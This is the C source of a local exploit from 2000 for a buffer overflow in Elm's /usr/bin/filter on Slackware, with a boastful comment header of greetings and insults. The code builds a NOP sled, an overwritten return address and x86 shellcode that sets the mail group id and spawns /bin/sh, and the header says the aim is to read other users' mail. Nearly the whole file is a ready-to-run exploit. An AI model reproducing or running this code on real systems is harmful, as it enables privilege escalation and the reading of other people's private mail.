/*
    Lo and behold, yet another "grab EGID mail on a Slack exploit"
 
    Almost a complete waste of valuable CPU time to execute...
    What is more questionable is who is maintaining the Elm package
    at this time, since this isn't just the second overflow I have
    seen in it and it probably won't be the last...
 
    Hope you all have a good time trying to read other people's mail
    (not that you can being EGID mail on most Slackware boxes, but hey :)
 
    Use as: filterape [offset] [EGID mail]
            Now you get nothing - use ^D to grab shell
 
    Cheers,
          Scrippie - #phreak.nl
                   - buffer0verfl0w Security
 
 
    Do not contact me at: ronald@grafix.nl
 
    Love to: Maja, Hester
 
    Shouts to (in random order): RFP, ADM, HNN, buffer0verfl0w security,
        Wiretrip, #phreak.nl, #hit2000, gov-boi, TESO, lcamtuf, HWA,
        Yarvje (your NT coding skills rock), robje, ^MACE^,
        and everyone who doesn't want to be included here
 
    May a place be reserved in the fiery bowels of Hell for:
       [tri]  - (of course no-one can hack your box when you firewall it dead,
                you should wonder if there is a bit of functionality left...)
       Gerrie - Proud holder of the ScriptKiddie of the year award for the past
                15 years
       JP     - That's a bit of a cliche :(
*/

#include <stdio.h>

#define EIP_OFF 517		/* EIP at 517 518 519 520    */
#define NOP 0x90		/* Hacker tool number one ;) */
#define MAILGID 12

char shellcode[]=
  "\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3\x0c\xcd\x80\x89\x76"
  "\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
  "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69\x6e\x2f"
  "\x73\x68";

unsigned long get_sp(void)
{
  __asm__("movl %esp, %eax");
}

main(int argc, char **argv)
{
  char foobar[1000];		/* Too lazy to malloc() */
  char gid=MAILGID;
  char *mailGid;
  int i, offset=5400;		/* What a bizarre offset :) */
  long RTFM;			/* Phrack 49 in this case */

  if(argc > 1) offset = atoi(argv[1]);

  if(argc > 2)
    {
      gid = (char) atoi(argv[2]);
      mailGid = (char *)strchr(shellcode, 0x0c);
      *mailGid = gid;
    }

  for(i=0;i<EIP_OFF - 3;i++)
    {
      foobar[i] = NOP;
    }

  RTFM = get_sp() - offset;

  foobar[i++] = 0xeb;		/* Short jmp over ret addy */
  foobar[i++] = 0x04;

  foobar[i++] =  RTFM        & 0xff;
  foobar[i++] = (RTFM >> 8)  & 0xff;
  foobar[i++] = (RTFM >> 16) & 0xff;
  foobar[i++] = (RTFM >> 24) & 0xff;
  foobar[i++] = 0x00;

  strcat(foobar, shellcode);

  execl("/usr/bin/filter", "I'm a scriptkiddie and I'm okay...", "-f", foobar, NULL);
  /* I scan al night, and I sleep all day... */
}
/*                    www.hack.co.za           [8 June 2000]*/